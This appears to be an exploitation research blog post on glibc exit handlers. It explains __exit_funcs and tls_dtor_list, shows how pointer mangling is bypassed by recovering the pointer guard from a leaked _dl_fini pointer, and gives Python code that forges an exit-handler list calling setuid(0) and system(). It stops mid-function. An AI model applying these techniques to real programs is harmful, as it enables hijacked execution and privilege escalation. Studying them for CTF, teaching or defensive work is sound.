Saturday, May 20, 2017

Notes on abusing exit handlers, bypassing pointer mangling and glibc ptmalloc hooks

Hi,

Today we'll talk about abusing exit handlers in order to hijack the control flow.

This research stemmed from a Google Project Zero article about heap overflow
NUL byte poisoning, where they described using __exit_funcs or tls_dtor_list
to achieve code execution.
The issue I had was finding a way to reliably resolve these
non-exported symbols and access them.

The exit handlers are quite interesting because they are an easy substitute
for ROP: they all take one parameter.
Functions such as setuid(), system() or other functions needing 1 parameter
can thus be easily called.

Pointer mangling is a mitigation implemented in order to thwart
direct function pointer corruption.
I'll show in this post how it can be bypassed.

We'll first analyze the code leading to the execution of these exit handlers
and then show how to trigger them.
There will be a lot of pasted listings ahead; these will be explained as we go.

Where is the code leading to executing these exit handlers?

About exit()

Whenever we call libc exit(), it calls all the handlers we registered
with atexit() and on_exit() before calling _exit(), which performs the
actual exit syscall.

This is located in "glibc/stdlib/exit.c".

void
exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true, true);
}

exit() is just a nicely named wrapper for "__run_exit_handlers()".

Let's look at __run_exit_handlers():

/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered
   perform stdio cleanup, and terminate program execution with STATUS.  */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
       bool run_list_atexit, bool run_dtors)
{
  /* First, call the TLS destructors.  */
#ifndef SHARED
  if (&__call_tls_dtors != NULL)
#endif
    if (run_dtors)
      __call_tls_dtors ();

  /* We do it this way to handle recursive calls to exit () made by
     the functions registered with `atexit' and `on_exit'. We call
     everyone on the list and use the status value in the last
     exit (). */
  while (*listp != NULL)
    {
      struct exit_function_list *cur = *listp;

      while (cur->idx > 0)
 {
   const struct exit_function *const f =
     &cur->fns[--cur->idx];
   switch (f->flavor)
     {
       void (*atfct) (void);
       void (*onfct) (int status, void *arg);
       void (*cxafct) (void *arg, int status);

     case ef_free:
     case ef_us:
       break;
     case ef_on:
       onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
       PTR_DEMANGLE (onfct);
#endif
       onfct (status, f->func.on.arg);
       break;
     case ef_at:
       atfct = f->func.at;
#ifdef PTR_DEMANGLE
       PTR_DEMANGLE (atfct);
#endif
       atfct ();
       break;
     case ef_cxa:
       cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
       PTR_DEMANGLE (cxafct);
#endif
       cxafct (f->func.cxa.arg, status);
       break;
     }
 }

      *listp = cur->next;
      if (*listp != NULL)
 /* Don't free the last element in the chain, this is the statically
    allocate element.  */
 free (cur);
    }

  if (run_list_atexit)
    RUN_HOOK (__libc_atexit, ());

  _exit (status);
}

We can see that "__run_exit_handlers()" demangles each function pointer with
PTR_DEMANGLE() before calling it.
We will thus need to analyze how the mangling and demangling are done in order
to bypass them.

We also see that it first tries to call "__call_tls_dtors()". This is
interesting because that function calls the destructors stored in
tls_dtor_list; we'll come back to it.

Let's look at what a 'struct exit_function_list' looks like.

This is located in "glibc/stdlib/exit.h".

enum
{
  ef_free, /* `ef_free' MUST be zero!  */
  ef_us,
  ef_on,
  ef_at,
  ef_cxa
};

struct exit_function
  {
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
      {
 void (*at) (void);
 struct
   {
     void (*fn) (int status, void *arg);
     void *arg;
   } on;
 struct
   {
     void (*fn) (void *arg, int status);
     void *arg;
     void *dso_handle;
   } cxa;
      } func;
  };
struct exit_function_list
  {
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];
  };

Each handler has one of 5 flavors : ef_free, ef_us, ef_on, ef_at and ef_cxa.
Depending on the flavor of the exit handler, we'll have a function pointer,
an argument and/or a dso handle.
Each list block can store at most 32 handlers and a linked list is created
if more are needed.
idx is the number of slots in use in the block, so the next handler to run is
fns[idx - 1] : handlers are called from the last registered to the first.
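
To make the layout concrete, here is a minimal Python sketch of the structures above, assuming the usual x86_64 sizes (8-byte pointers, size_t and long). The helper names (entry_offset, walk) and the sample values are made up for illustration and are not part of glibc.

```python
import struct

# Flavor values from the enum in exit.h.
EF_FREE, EF_US, EF_ON, EF_AT, EF_CXA = range(5)

HEADER = struct.Struct("<QQ")    # next, idx
ENTRY = struct.Struct("<qQQQ")   # flavor, then the three slots of the union
MAX_FNS = 32


def entry_offset(i):
    """Byte offset of fns[i] inside struct exit_function_list."""
    return HEADER.size + i * ENTRY.size


def walk(block):
    """Yield (index, flavor, fn, arg) in the order the handlers would run."""
    _next, idx = HEADER.unpack_from(block, 0)
    while idx > 0:
        idx -= 1                                  # mirrors &cur->fns[--cur->idx]
        flavor, fn, arg, _dso = ENTRY.unpack_from(block, entry_offset(idx))
        yield idx, flavor, fn, arg


# Two made-up ef_cxa entries; the function values are placeholders.
block = HEADER.pack(0, 2)
block += ENTRY.pack(EF_CXA, 0x1111, 0xAAAA, 0)
block += ENTRY.pack(EF_CXA, 0x2222, 0xBBBB, 0)

order = [fn for _i, _flavor, fn, _arg in walk(block)]
print([hex(fn) for fn in order])
```

Each entry is 32 bytes, which matches the "shl rdx,0x5" seen in the disassembly of __run_exit_handlers(), and the first entry starts 16 bytes into the block.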

And here are the PTR_MANGLE() and PTR_DEMANGLE() definitions from "sysdeps/unix/sysv/linux/x86_64/sysdep.h".

#  define PTR_MANGLE(var) asm ("xor %%fs:%c2, %0\n"        \
         "rol $2*" LP_SIZE "+1, %0"        \
         : "=r" (var)         \
         : "0" (var),         \
           "i" (offsetof (tcbhead_t,       \
            pointer_guard)))
#  define PTR_DEMANGLE(var) asm ("ror $2*" LP_SIZE "+1, %0\n"       \
         "xor %%fs:%c2, %0"         \
         : "=r" (var)         \
         : "0" (var),         \
           "i" (offsetof (tcbhead_t,       \
            pointer_guard)))

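Here we can see that it uses the offset of "pointer_guard" in
the structure "tcbhead_t" to read the pointer guard through fs;
this will be fs:0x30 on 64-bit machines.
Mangling XORs the pointer with the guard, then rotates it left by
2*LP_SIZE+1 = 0x11 bits; demangling applies the inverse steps in reverse order.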
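
The two macros can be modelled in a few lines of Python. This is only a sketch of the x86_64 variant shown above (LP_SIZE is 8 there); the function names and the guard and pointer values are invented for the example.

```python
MASK64 = (1 << 64) - 1
ROTATION = 2 * 8 + 1  # "2*LP_SIZE+1" with LP_SIZE == 8 on x86_64, i.e. 0x11


def rol64(value, bits):
    """Rotate a 64-bit value left."""
    bits %= 64
    value &= MASK64
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def ror64(value, bits):
    """Rotate a 64-bit value right."""
    return rol64(value, 64 - (bits % 64))


def ptr_mangle(ptr, guard):
    # xor %fs:0x30, reg ; rol $0x11, reg
    return rol64(ptr ^ guard, ROTATION)


def ptr_demangle(mangled, guard):
    # ror $0x11, reg ; xor %fs:0x30, reg
    return ror64(mangled, ROTATION) ^ guard


# Made-up values, only there to exercise the round trip.
guard = 0x1122334455667788
func = 0x00007FFFF7A52390
mangled = ptr_mangle(func, guard)
restored = ptr_demangle(mangled, guard)
print(hex(mangled), hex(restored))
```

The important property is that the transformation is fully reversible by anyone who knows the guard, and that one known (pointer, mangled pointer) pair is enough to recover it.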

The assembly of "__run_exit_handlers()".

pwndbg> disassemble __run_exit_handlers
Dump of assembler code for function __run_exit_handlers:
   0x0000000000039f10 <+0>: push   r13
   0x0000000000039f12 <+2>: push   r12
   0x0000000000039f14 <+4>: mov    r12d,edx
   0x0000000000039f17 <+7>: push   rbp
   0x0000000000039f18 <+8>: push   rbx
   0x0000000000039f19 <+9>: mov    rbp,rsi
   0x0000000000039f1c <+12>: mov    ebx,edi
   0x0000000000039f1e <+14>: sub    rsp,0x8
   0x0000000000039f22 <+18>: call   0x3a5c0 <__gi___call_tls_dtors>
   0x0000000000039f27 <+23>: mov    r13,QWORD PTR [rbp+0x0]
   0x0000000000039f2b <+27>: test   r13,r13
   0x0000000000039f2e <+30>: je     0x39f80 <__run_exit_handlers>
   0x0000000000039f30 <+32>: mov    rax,QWORD PTR [r13+0x8]
   0x0000000000039f34 <+36>: mov    rdx,rax
   0x0000000000039f37 <+39>: shl    rdx,0x5
   0x0000000000039f3b <+43>: test   rax,rax
   0x0000000000039f3e <+46>: lea    rcx,[r13+rdx*1-0x10]
   0x0000000000039f43 <+51>: je     0x39f6f <__run_exit_handlers>
   0x0000000000039f45 <+53>: sub    rax,0x1
   0x0000000000039f49 <+57>: mov    QWORD PTR [r13+0x8],rax
   0x0000000000039f4d <+61>: mov    rdx,QWORD PTR [rcx]
   0x0000000000039f50 <+64>: cmp    rdx,0x3
   0x0000000000039f54 <+68>: je     0x3a000 <__run_exit_handlers>
 ; ef_cxa
   0x0000000000039f5a <+74>: cmp    rdx,0x4
   0x0000000000039f5e <+78>: je     0x39fd8 <__run_exit_handlers>

   0x0000000000039f60 <+80>: cmp    rdx,0x2
   0x0000000000039f64 <+84>: je     0x39fb0 <__run_exit_handlers>
   0x0000000000039f66 <+86>: sub    rcx,0x20
   0x0000000000039f6a <+90>: test   rax,rax
   0x0000000000039f6d <+93>: jne    0x39f45 <__run_exit_handlers>
   0x0000000000039f6f <+95>: mov    rax,QWORD PTR [r13+0x0]
   0x0000000000039f73 <+99>: test   rax,rax
   0x0000000000039f76 <+102>: mov    QWORD PTR [rbp+0x0],rax
   0x0000000000039f7a <+106>: jne    0x3a01d <__run_exit_handlers>
   0x0000000000039f80 <+112>: test   r12b,r12b
   0x0000000000039f83 <+115>: je     0x39fa4 <__run_exit_handlers>
   0x0000000000039f85 <+117>: lea    rbp,[rip+0x38594c]        # 0x3bf8d8 <__elf_set___libc_atexit_element__io_cleanup__>
   0x0000000000039f8c <+124>: lea    r12,[rip+0x38594d]        # 0x3bf8e0 <__elf_set___libc_thread_subfreeres_element_arena_thread_freeres__>
   0x0000000000039f93 <+131>: cmp    rbp,r12
   0x0000000000039f96 <+134>: jae    0x39fa4 <__run_exit_handlers>
   0x0000000000039f98 <+136>: call   QWORD PTR [rbp+0x0]
   0x0000000000039f9b <+139>: add    rbp,0x8
   0x0000000000039f9f <+143>: cmp    rbp,r12
   0x0000000000039fa2 <+146>: jb     0x39f98 <__run_exit_handlers>
   0x0000000000039fa4 <+148>: mov    edi,ebx
   0x0000000000039fa6 <+150>: call   0xcbb60 <__gi__exit>
   0x0000000000039fab <+155>: nop    DWORD PTR [rax+rax*1+0x0]
   0x0000000000039fb0 <+160>: shl    rax,0x5
   0x0000000000039fb4 <+164>: mov    edi,ebx
   0x0000000000039fb6 <+166>: add    rax,r13
   0x0000000000039fb9 <+169>: mov    rdx,QWORD PTR [rax+0x18]
   0x0000000000039fbd <+173>: mov    rsi,QWORD PTR [rax+0x20]
   0x0000000000039fc1 <+177>: ror    rdx,0x11
   0x0000000000039fc5 <+181>: xor    rdx,QWORD PTR fs:0x30
   0x0000000000039fce <+190>: call   rdx
   0x0000000000039fd0 <+192>: jmp    0x39f30 <__run_exit_handlers>
   0x0000000000039fd5 <+197>: nop    DWORD PTR [rax]

 ; ef_cxa
   0x0000000000039fd8 <+200>: shl    rax,0x5
   0x0000000000039fdc <+204>: mov    esi,ebx
   0x0000000000039fde <+206>: add    rax,r13
   0x0000000000039fe1 <+209>: mov    rdx,QWORD PTR [rax+0x18]
   0x0000000000039fe5 <+213>: mov    rdi,QWORD PTR [rax+0x20]
   0x0000000000039fe9 <+217>: ror    rdx,0x11
   0x0000000000039fed <+221>: xor    rdx,QWORD PTR fs:0x30
   0x0000000000039ff6 <+230>: call   rdx
   0x0000000000039ff8 <+232>: jmp    0x39f30 <__run_exit_handlers>
   0x0000000000039ffd <+237>: nop    DWORD PTR [rax]
   0x000000000003a000 <+240>: shl    rax,0x5
   0x000000000003a004 <+244>: mov    rax,QWORD PTR [r13+rax*1+0x18]
   0x000000000003a009 <+249>: ror    rax,0x11
   0x000000000003a00d <+253>: xor    rax,QWORD PTR fs:0x30
   0x000000000003a016 <+262>: call   rax
   0x000000000003a018 <+264>: jmp    0x39f30 <__run_exit_handlers>
   0x000000000003a01d <+269>: mov    rdi,r13
   0x000000000003a020 <+272>: call   0x1f8a8
   0x000000000003a025 <+277>: jmp    0x39f27 <__run_exit_handlers>
End of assembler dump.

In case you missed it, the code that really interests us is this:

   0x0000000000039fe9 <+217>: ror    rdx,0x11
   0x0000000000039fed <+221>: xor    rdx,QWORD PTR fs:0x30
   0x0000000000039ff6 <+230>: call   rdx


So what's stored at fs:0x30?
Let's look at the Thread Control Block.

About Thread Control Block

As we saw in PTR_MANGLE() and PTR_DEMANGLE(), it all has to do with
the structure "tcbhead_t".
This structure is what FS points to; it holds the per-thread data
(TCB stands for Thread Control Block).

So at fs:0x30 we get the pointer_guard.

It's the pointer guard as defined in "sysdeps/x86_64/nptl/tls.h" in the
structure "tcbhead_t".

typedef struct
{
  void *tcb;  /* Pointer to the TCB.  Not necessarily the
      thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;  /* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  uintptr_t pointer_guard;
  unsigned long int vgetcpu_cache[2];
# ifndef __ASSUME_PRIVATE_FUTEX
  int private_futex;
# else
  int __glibc_reserved1;
# endif
  int __glibc_unused1;
  /* Reservation of some values for the TM ABI.  */
  void *__private_tm[4];
  /* GCC split stack support.  */
  void *__private_ss;
  long int __glibc_reserved2;
  /* Must be kept even if it is no longer used by glibc since programs,
     like AddressSanitizer, depend on the size of tcbhead_t.  */
  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

  void *__padding[8];
} tcbhead_t;
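
The 0x30 offset can be double-checked by rebuilding the first fields of the structure above with ctypes. This is a sketch that assumes the x86_64 layout (8-byte pointers and uintptr_t, 4-byte int); the class name TcbHeadPrefix is made up and only the fields up to pointer_guard are modelled.

```python
import ctypes


class TcbHeadPrefix(ctypes.Structure):
    """First fields of tcbhead_t, with fixed-width types for x86_64."""
    _fields_ = [
        ("tcb", ctypes.c_uint64),               # void *tcb
        ("dtv", ctypes.c_uint64),               # dtv_t *dtv
        ("self_ptr", ctypes.c_uint64),          # void *self
        ("multiple_threads", ctypes.c_int32),
        ("gscope_flag", ctypes.c_int32),
        ("sysinfo", ctypes.c_uint64),
        ("stack_guard", ctypes.c_uint64),
        ("pointer_guard", ctypes.c_uint64),
    ]


stack_guard_offset = TcbHeadPrefix.stack_guard.offset
pointer_guard_offset = TcbHeadPrefix.pointer_guard.offset
print(hex(stack_guard_offset), hex(pointer_guard_offset))
```

The stack canary lands at fs:0x28 and the pointer guard right after it at fs:0x30, which agrees with the "xor rdx,QWORD PTR fs:0x30" instructions in the listings.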


Where is that pointer_guard set up?


It's set up in "csu/libc-start.c".

  /* Set up the pointer guard value.  */
  uintptr_t pointer_chk_guard = _dl_setup_pointer_guard (_dl_random,
        stack_chk_guard);
# ifdef THREAD_SET_POINTER_GUARD
  THREAD_SET_POINTER_GUARD (pointer_chk_guard);
# else
  __pointer_chk_guard_local = pointer_chk_guard;
# endif

We could go and read the code of "_dl_setup_pointer_guard()", but I did not
research that part.

We still need to determine where we can hit and overwrite these handlers.
Let's start with __exit_funcs.

About atexit() and finding __exit_funcs


The code behind "atexit()" is located in "cxa_atexit.c":

/* Register a function to be called by exit or when a shared library
   is unloaded.  This function is only called from code generated by
   the C++ compiler.  */
int
__cxa_atexit (void (*func) (void *), void *arg, void *d)
{
  return __internal_atexit (func, arg, d, &__exit_funcs);
}
libc_hidden_def (__cxa_atexit)

And the corresponding assembly.

pwndbg> disassemble __cxa_atexit 
Dump of assembler code for function __GI___cxa_atexit:
   0x000000000003a280 <+0>: push   r12
   0x000000000003a282 <+2>: push   rbp
   0x000000000003a283 <+3>: mov    r12,rsi
   0x000000000003a286 <+6>: push   rbx
   0x000000000003a287 <+7>: mov    rbx,rdi
   0x000000000003a28a <+10>: lea    rdi,[rip+0x389367]        # 0x3c35f8 <__exit_funcs>
   0x000000000003a291 <+17>: mov    rbp,rdx
   0x000000000003a294 <+20>: call   0x3a0a0 <__new_exitfn>
   0x000000000003a299 <+25>: test   rax,rax
   0x000000000003a29c <+28>: je     0x3a2c8 <__gi___cxa_atexit>
   0x000000000003a29e <+30>: mov    rdi,rbx
   0x000000000003a2a1 <+33>: mov    QWORD PTR [rax+0x10],r12
   0x000000000003a2a5 <+37>: mov    QWORD PTR [rax+0x18],rbp
   0x000000000003a2a9 <+41>: xor    rdi,QWORD PTR fs:0x30
   0x000000000003a2b2 <+50>: rol    rdi,0x11
   0x000000000003a2b6 <+54>: mov    QWORD PTR [rax+0x8],rdi
   0x000000000003a2ba <+58>: mov    QWORD PTR [rax],0x4
   0x000000000003a2c1 <+65>: xor    eax,eax
   0x000000000003a2c3 <+67>: pop    rbx
   0x000000000003a2c4 <+68>: pop    rbp
   0x000000000003a2c5 <+69>: pop    r12
   0x000000000003a2c7 <+71>: ret    
   0x000000000003a2c8 <+72>: mov    eax,0xffffffff
   0x000000000003a2cd <+77>: jmp    0x3a2c3 <__gi___cxa_atexit>
End of assembler dump.

What's interesting is "__exit_funcs" being used.
"__exit_funcs" is an un-exported variable but we can resolve it by disassembling
that piece of code with capstone and retrieving the needed VA.
"__cxa_atexit()" is an exported symbol so we can retrieve its VA easily using
pwntools.elf.ELF.
You can see at VA 0x3a28a that it computes the address of "__exit_funcs"
with a RIP-relative lea.

Here is the code I wrote to do just that:

from capstone import Cs, CS_ARCH_X86, CS_MODE_64, x86

# get __exit_funcs addr
# code : raw bytes of the libc file
# off  : offset of __cxa_atexit (file offset == VA is assumed here)
def get_exit_funcs (code, off = 0):
    md = Cs (CS_ARCH_X86, CS_MODE_64)
    md.detail = True

    # look for the first RIP-relative lea, it loads &__exit_funcs
    for inst in md.disasm (code[off:], off):
        if inst.mnemonic != 'lea':
            continue
        for operand in inst.operands:
            if operand.type != x86.X86_OP_MEM:
                continue
            if inst.reg_name (operand.value.mem.base) != 'rip':
                continue
            # RIP-relative : target = address of next instruction + displacement
            return inst.address + inst.size + operand.value.mem.disp

    # no matching instruction found
    return None
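
The address arithmetic can be checked by hand against the __cxa_atexit listing, without capstone. The sketch below decodes one RIP-relative instruction manually; the raw bytes are my own encoding of "lea rdi,[rip+0x389367]" (the listing does not show them), and rip_relative_target is a hypothetical helper name.

```python
import struct


def rip_relative_target(insn_addr, insn_bytes):
    """Target of a 7-byte 'REX.W opcode ModRM disp32' RIP-relative operand."""
    if len(insn_bytes) != 7:
        raise ValueError("expected a 7-byte instruction")
    modrm = insn_bytes[2]
    if modrm & 0xC7 != 0x05:          # mod == 00 and rm == 101 : [rip + disp32]
        raise ValueError("not a RIP-relative operand")
    (disp,) = struct.unpack_from("<i", insn_bytes, 3)
    # RIP already points at the next instruction when the operand is resolved.
    return insn_addr + len(insn_bytes) + disp


# Assumed encoding of the lea found at 0x3a28a in the listing.
lea = bytes.fromhex("488d3d67933800")
exit_funcs = rip_relative_target(0x3A28A, lea)
print(hex(exit_funcs))
```

The result matches the 0x3c35f8 that gdb prints next to the instruction: 0x3a28a + 7 + 0x389367.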

I'll show at the end of the article how to use it to bypass pointer mangling.
Let's first have a look at tls_dtor_list.

About __call_tls_dtors() and finding tls_dtor_list


I mentioned earlier that "__call_tls_dtors()" is an interesting piece of code
to look at.

/* Call the destructors.  This is called either when a thread returns from the
   initial function or when the process exits via the exit function.  */
void
__call_tls_dtors (void)
{
  while (tls_dtor_list)
    {
      struct dtor_list *cur = tls_dtor_list;
      dtor_func func = cur->func;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (func);
#endif

      tls_dtor_list = tls_dtor_list->next;
      func (cur->obj);

      /* Ensure that the MAP dereference happens before
  l_tls_dtor_count decrement.  That way, we protect this access from a
  potential DSO unload in _dl_close_worker, which happens when
  l_tls_dtor_count is 0.  See CONCURRENCY NOTES for more detail.  */
      atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
      free (cur);
    }
}

The part that really interests us is the use of tls_dtor_list.

The corresponding assembly:
pwndbg> disassemble __GI___call_tls_dtors
Dump of assembler code for function __GI___call_tls_dtors:
   0x000000000003a5c0 <+0>: push   rbp
   0x000000000003a5c1 <+1>: push   rbx
   0x000000000003a5c2 <+2>: sub    rsp,0x8
   0x000000000003a5c6 <+6>: mov    rbp,QWORD PTR [rip+0x3887b3]        # 0x3c2d80
   0x000000000003a5cd <+13>: mov    rbx,QWORD PTR fs:[rbp+0x0]
   0x000000000003a5d2 <+18>: test   rbx,rbx
   0x000000000003a5d5 <+21>: je     0x3a61e <__gi___call_tls_dtors>
   0x000000000003a5d7 <+23>: nop    WORD PTR [rax+rax*1+0x0]
   0x000000000003a5e0 <+32>: mov    rdx,QWORD PTR [rbx+0x18]
   0x000000000003a5e4 <+36>: mov    rax,QWORD PTR [rbx]
   0x000000000003a5e7 <+39>: mov    rdi,QWORD PTR [rbx+0x8]
   0x000000000003a5eb <+43>: ror    rax,0x11
   0x000000000003a5ef <+47>: xor    rax,QWORD PTR fs:0x30
   0x000000000003a5f8 <+56>: mov    QWORD PTR fs:[rbp+0x0],rdx
   0x000000000003a5fd <+61>: call   rax
   0x000000000003a5ff <+63>: mov    rax,QWORD PTR [rbx+0x10]
   0x000000000003a603 <+67>: lock sub QWORD PTR [rax+0x450],0x1
   0x000000000003a60c <+76>: mov    rdi,rbx
   0x000000000003a60f <+79>: call   0x1f8a8
   0x000000000003a614 <+84>: mov    rbx,QWORD PTR fs:[rbp+0x0]
   0x000000000003a619 <+89>: test   rbx,rbx
   0x000000000003a61c <+92>: jne    0x3a5e0 <__gi___call_tls_dtors>
   0x000000000003a61e <+94>: add    rsp,0x8
   0x000000000003a622 <+98>: pop    rbx
   0x000000000003a623 <+99>: pop    rbp
   0x000000000003a624 <+100>: ret    
End of assembler dump.

You can see at VA 0x3a5c6 that it loads the TLS offset of tls_dtor_list
(stored at 0x3c2d80), which is then used relative to fs to read the list head.
So we can disassemble that function and find that offset using capstone.
"__call_tls_dtors" is exported so its address can be easily parsed out
using pwntools.elf.ELF.

I didn't write code for it but the idea is the same as for __exit_funcs;
this is left as an exercise to the reader.
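
As a starting point for that exercise, here is an untested-against-a-real-target sketch. It decodes the mov at 0x3a5c6 by hand (the raw bytes are my own encoding of that instruction), shows how the TLS offset read from that slot combines with the fs base, and packs one list entry with the field offsets visible in the listing (func +0x00, obj +0x08, map +0x10, next +0x18). All helper names and sample values are made up.

```python
import struct

MASK64 = (1 << 64) - 1


def rip_relative_target(insn_addr, insn_bytes):
    """Target of a 7-byte 'REX.W opcode ModRM disp32' RIP-relative operand."""
    if len(insn_bytes) != 7 or insn_bytes[2] & 0xC7 != 0x05:
        raise ValueError("not a 7-byte RIP-relative instruction")
    (disp,) = struct.unpack_from("<i", insn_bytes, 3)
    return insn_addr + len(insn_bytes) + disp


def tls_variable_address(fs_base, tpoff):
    """The variable lives at fs_base + tpoff, where tpoff is a signed offset."""
    return (fs_base + tpoff) & MASK64


def pack_dtor_list(mangled_func, obj, link_map, next_entry=0):
    """One list entry: func, obj, map, next (8 bytes each)."""
    return struct.pack("<QQQQ", mangled_func, obj, link_map, next_entry)


# Assumed encoding of 'mov rbp,QWORD PTR [rip+0x3887b3]' at 0x3a5c6.
mov = bytes.fromhex("488b2db3873800")
slot = rip_relative_target(0x3A5C6, mov)

# Made-up runtime values: fs base and the offset read from that slot.
list_head = tls_variable_address(0x7FFFF7FD4700, -0x60)
entry = pack_dtor_list(0xDEADBEEF, 0x4141, 0x602000)
print(hex(slot), hex(list_head), len(entry))
```

Two details from the listing matter when forging an entry: after the call, the code decrements a counter at map+0x450, so map has to point to writable memory, and the entry itself is then passed to free().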

Bypassing pointer mangling


While playing with a binary challenge, I noticed that _dl_fini()
is often registered in the __exit_funcs array. Knowing both its real address
and its mangled value, we can recompute the pointer_guard value and thus
bypass pointer mangling.

The issue with "_dl_fini()" is that it seems to be an un-exported symbol.
I found its address while digging in gdb.
An ELF parser would probably have to be written to find the "_dl_fini()" address.

A vulnerability that allows you to leak an encoded pointer from __exit_funcs
is also necessary.
Here we use the encoded _dl_fini pointer.

The formula to compute the pointer_guard, assuming that "_dl_fini()"
is the registered handler, is as follows:

ptr_guard = ror (ptr_encoded, 0x11, 64) ^ _dl_fini

Here is the code you've been waiting for. We re-use "get_exit_funcs()" that
was shown earlier.

# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
 
# Rotate right: 0b1001 --> 0b1100
ror = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

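import struct
from pwn import ELF

# libc_filename, libc_base, start_data, libc_data and _dl_fini are provided by
# the rest of the exploit : libc_data is presumably a leaked dump of libc's
# data starting at address start_data
elf = ELF (libc_filename)

# get libc data (raw bytes)
with open (libc_filename, 'rb') as fp:
    content = fp.read ()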

# get our exit_funcs address
off_cxa_atexit = elf.symbols['__cxa_atexit']
ptr_exit_funcs = libc_base + get_exit_funcs (content, off_cxa_atexit)
off_exit_funcs = ptr_exit_funcs - start_data
__exit_funcs = struct.unpack ('<Q', libc_data[off_exit_funcs:off_exit_funcs + 8])[0]
# our encoded pointer location
off_ptr_encoded = (__exit_funcs - start_data) + 24
ptr_encoded = struct.unpack ('<Q', libc_data[off_ptr_encoded:off_ptr_encoded + 8])[0]
# this is used to encode pointers
ptr_guard = ror (ptr_encoded, 0x11, 64) ^ _dl_fini

print '\n[+] Leak __exit_funcs'
print 'start_data               : 0x%016x' % start_data
print 'ptr_exit_funcs           : 0x%016x' % ptr_exit_funcs
print 'exit_funcs               : 0x%016x' % __exit_funcs
print 'off_ptr_encoded          : 0x%016x' % off_ptr_encoded
print 'ptr_encoded              : 0x%016x' % ptr_encoded
print 'ptr_guard                : 0x%016x' % ptr_guard
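
The recovery step can be sanity-checked in isolation. The sketch below is Python 3 and uses invented values for the guard and for the addresses of _dl_fini and system(); recover_guard is a hypothetical helper name.

```python
MASK64 = (1 << 64) - 1


def rol64(value, bits):
    bits %= 64
    value &= MASK64
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def ror64(value, bits):
    return rol64(value, 64 - (bits % 64))


def recover_guard(ptr_encoded, known_ptr):
    """ptr_guard = ror (ptr_encoded, 0x11, 64) ^ known_ptr"""
    return ror64(ptr_encoded, 0x11) ^ known_ptr


# Made-up secret and addresses, standing in for the real process state.
secret_guard = 0x5F3A9C0DE1B27744
dl_fini = 0x00007FFFF7DE7AB0
system = 0x00007FFFF7A52390

# What the leak would return: the mangled _dl_fini stored in __exit_funcs.
leaked = rol64(dl_fini ^ secret_guard, 0x11)

recovered = recover_guard(leaked, dl_fini)
forged = rol64(system ^ recovered, 0x11)   # mangled pointer we would write
print(hex(recovered), hex(forged))
```

Once the guard is recovered, any pointer can be mangled exactly the way glibc would do it, so the demangling code ends up calling the address we chose.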

Now that we've got the pointer_guard, what do we do?

We craft a fake __exit_funcs and corrupt the original __exit_funcs.

class CxaFunc (object):
    def __init__ (self, func, arg, ptr_guard):
        self.func = func
        self.arg = arg
        self.ptr_guard = ptr_guard

    def __str__ (self):
        # flavor = 4 (ef_cxa) + func + arg + NULL (dso handle)
        if self.ptr_guard:
            encoded = rol (self.func ^ self.ptr_guard, 0x11, 64)
        else:
            encoded = self.func
        print 'func : 0x%016x | encoded : 0x%016x | arg : 0x%016x' % (self.func, encoded, self.arg)
        # ef_cxa == 4 | encoded function pointer | argument | dso handle set to NULL
        data = struct.pack ('<Q', 4) + struct.pack ('<Q', encoded) + struct.pack ('<Q', self.arg) + struct.pack ('<Q', 0)
        return data

class ExitHandlers (object):
    def __init__ (self, ptr_guard):
        self.handlers = list ()
        self.ptr_guard = ptr_guard

    def append (self, func, arg):
        cxafunc = CxaFunc (func, arg, self.ptr_guard)
        self.handlers.append (cxafunc)

    def __str__ (self):
        fake_exit_funcs = ''
        # next = NULL
        fake_exit_funcs += struct.pack ('<Q', 0)
        # idx = number of handlers
        print 'Packing %d handlers' % len (self.handlers)
        fake_exit_funcs += struct.pack ('<Q', len (self.handlers))
        for cxafunc in self.handlers:
            fake_exit_funcs += str (cxafunc)

        return fake_exit_funcs

# build our exit_funcs functions list
fake_exit_funcs = ExitHandlers (ptr_guard)
# setuid
fake_exit_funcs.append (func_setuid, 0)
# system and get cmd
for heap_addr in heap_addrs:
    fake_exit_funcs.append (func_system, heap_addr)
fake_exit_funcs = str (fake_exit_funcs)

Provided you've recomputed the proper pointer_guard, pointer mangling is
bypassed.
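
For readers on Python 3, here is a bytes-based sketch of the same idea, together with a tiny replay of the ef_cxa path of __run_exit_handlers() to check the result. It is not the code used for the challenge: function names, addresses and the guard are made up. One design choice differs on purpose: since the loop consumes fns[idx - 1] first, this version takes the calls in the order they should happen and stores them reversed.

```python
import struct

MASK64 = (1 << 64) - 1
EF_CXA = 4
MAX_FNS = 32


def rol64(value, bits):
    bits %= 64
    value &= MASK64
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def ror64(value, bits):
    return rol64(value, 64 - (bits % 64))


def build_fake_list(calls, guard):
    """calls: (func, arg) pairs in the order they should be invoked."""
    if len(calls) > MAX_FNS:
        raise ValueError("one block holds at most 32 handlers")
    blob = struct.pack("<QQ", 0, len(calls))        # next = NULL, idx
    for func, arg in reversed(calls):               # fns[idx - 1] runs first
        mangled = rol64(func ^ guard, 0x11)
        blob += struct.pack("<QQQQ", EF_CXA, mangled, arg, 0)  # dso = NULL
    return blob


def replay(blob, guard):
    """Return the (func, arg) calls the ef_cxa path would make, in order."""
    _next, idx = struct.unpack_from("<QQ", blob, 0)
    called = []
    while idx > 0:
        idx -= 1
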